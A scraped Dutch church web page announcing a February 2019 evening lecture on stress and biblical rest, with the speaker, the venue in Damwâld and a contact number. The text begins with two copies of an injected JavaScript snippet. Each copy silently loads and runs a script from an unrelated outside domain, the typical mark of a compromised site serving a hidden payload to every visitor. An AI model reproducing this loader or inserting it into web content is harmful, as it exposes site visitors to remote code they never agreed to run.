;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); NPV avond: Stress de baas? - PKN Damwâld
13 februari 2019
19:45 t/m 21:00
NPV avond: Stress de baas?

Op DV woensdag 13 februari is er een avond van de N.P.V afd. Dantumadiel/ Tytsjerksteradiel.
Prof.J.W.Maris emeritus hoogleraar aan de Theologische Universiteit te Apeldoorn hoopt een lezing te houden over “Stress de baas?”
We leven in een gejaagde tijd met veel prikkels. Onze tijd wordt wel de”prestatie”cultuur genoemd. Stress is niet ongezond, we hebben het zelfs wel eens nodig.
Veel mensen ervaren een grote mate van druk en voelen zich vast gelopen. Bijvoorbeeld yoga lijkt voor sommigen een goede manier om stress de baas te worden.
De spreker zal proberen voorbeelden te behandelen en handvatten te geven voor het onderscheiden van achtergronden en herkomst van b.v. oosterse religieuze bronnen.
Maar wat zegt de Bijbel ons over rust vinden? U bent welkom op onze thema avond, er is gelegenheid om uw/ jou vragen te stellen.
Neem gerust anderen mee.

Aanvang 19.45 uur.
In de chr.geref.kerk, Haadwei 127 Damwald. Aanvang 19.45 uur.
Voor inlichtingen mw.A.Kooistra tel: 0511 420899